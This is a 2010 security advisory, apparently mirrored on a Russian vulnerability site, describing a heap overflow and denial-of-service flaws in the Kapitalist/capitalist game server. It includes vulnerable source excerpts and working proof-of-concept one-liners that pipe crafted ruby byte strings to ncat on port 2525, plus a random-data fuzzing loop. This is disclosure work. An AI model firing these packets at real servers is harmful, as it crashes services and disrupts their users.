Информационная безопасность
[RU] switch to English

Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  phpvidz Administrative Password Disclosure

  LinksAutomation Multiple Remote Vulnerabilities

  phpGroupWare SQL Injections and Local File Inclusion Vulnerabilities (CVE-2010-0403 and CVE-2010-0404)

  Vulnerability in 3D user cloud for Joomla

From:Sébastien Duquette <sduquette_(at)_gardienvirtuel.com>
Date:17 мая 2010 г.
Subject:GVI-2010-01 Multiple vulnerabilities in Kapitalist/capitalist

GVI-2010-01 : Multiple vulnerabilities in Kapitalist/capitalist

Quote from http://kapitalist.sourceforge.net/
"Kapitalist is a Monopoly®-like board game for 2-8 players. Walk around the
board, buy properties, receive rent from your competitors, try to get
monopolies to build houses and hotels on them and finally be the richest
on the
board. "

Two issues were found in capitalist when sending specially crafted
packets. One
results in heap corruption, the second makes the server enter in an
endless loop
resulting in a Denial-of-Service.

Additionally, sending a specially crafted packet causes the connected
to disconnect.

Vulnerable Product : capitalist 0.3.1, Kapitalist 0.4
Vulnerability Type : Buffer overflow, Denial-of-Service
Discovered by      : Sébastien Duquette (virtualguardian.ca)

Original Advisory :

The vendor was contacted but no response was received in a two weeks delay.

Bug Discovered        :  October 12th, 2009
Vendor Advised        :  October 14th, 2009
Additional info sent  :  October 17th, 2009
Vendor Response       :  October 26th, 2009
Vendor recontacted    : February  7th, 2010
Vendor Response       : February 14th, 2010
Public Disclosure     :      May 13th, 2010

When receiving a join game request, capitalist allocates a
structure on the heap and copies the received data to it. On the last shown
line, it copies a string. It does not check however if the string fits
in the
allocated buffer.

common/packets.cpp, line 432
       struct packet_req_join_game *
       receive_packet_req_join_game(struct connection *pc)
         unsigned char *cptr;
         struct packet_req_join_game *packet=
               (struct packet_req_join_game *)
               cap_malloc(sizeof(struct packet_req_join_game));

         cptr=get_int16(pc->buffer.data, NULL);
         cptr=get_int8(cptr, NULL);
         cptr=get_string(cptr, packet->name);
When called, the get_string() method will copy the string and cause a buffer
overflow if the string is longer than the allocated size (10 bytes).
common/packets.cpp, line 271
       unsigned char *get_string(unsigned char *buffer, char *mystring)
         unsigned char *c;
         int len;

         /* avoid using strlen (or strcpy) on an (unsigned char*)  --dwp */
         for(c=buffer; *c; c++) ;
         len = c-buffer+1;
         if(mystring) {
               memcpy(mystring, buffer, len);
         return buffer+len;
Proof of concept

Bug #1: Heap corruption

ruby -e "print 0x00.chr << 0x14 << 0x00 << 'A'*35 << 0x00 " | ncat

If MALLOC_CHECK_ is enabled, a similar message will be printed :
*** glibc detected *** /home/ekse/src/capitalist2/bin/capitalist: malloc():
memory corruption: 0x081a7650 ***

Inspecting the memory shows that our packet is the source of the crash:
(gdb) x 0x081a7650
0x81a7650:      0x00414141

Bug #2: Endless loop

ruby -e "print 0x00.chr << 0x14 << 0x00 << 'AAAAAAAAAA' << 0x00.chr * 8
<< 0x02
<< 0x00.chr * 3 << 0x00" | ncat SERVER 2525

Bug #3: Crashing the clients

ruby -e "print 0x00.chr << 0x14 << 0x00 << 'AAAAA' << 0x00.chr * 8 <<
0x02 <<
0x00.chr * 3 << 0x00" | ncat SERVER 2525

After sending this packet, close ncat. The clients will then crash with the
following message :
kapitalist: kapgame.cpp:239: Player* const KapGame::player(int) const:
Assertion `!nobody(id)'  failed.

Fun Fact
The flaw in the server was found this way :
while true; do cat /dev/urandom | nc 2525
There are currently no fix for these issues. It is recommend not to make
available on the Internet and accept connections only from trusted sources.

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород